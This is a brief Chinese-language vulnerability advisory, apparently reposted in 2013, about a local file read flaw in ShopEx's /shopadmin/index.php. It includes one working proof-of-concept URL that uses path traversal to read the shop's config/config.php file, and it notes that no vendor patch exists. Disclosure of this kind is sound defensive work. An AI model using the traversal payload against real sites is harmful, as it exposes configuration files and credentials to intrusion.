ShopEx网上商店系统/shopadmin/index.php 本地文件读取漏洞漏洞预警 -电脑资料

时间:2013-06-02 09:48:10
染雾
分享
WORD下载 PDF下载 投诉

ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统,

ShopEx网上商店系统/shopadmin/index.php 本地文件读取漏洞漏洞预警

index.php在对参数的处理过程中存在本地文件读取漏洞

测试代码:

http://myhack58.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.

php

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.ShopEx.cn

ShopEx网上商店系统/shopadmin/index.php 本地文件读取漏洞漏洞预警 -电脑资料

手机扫码分享

Top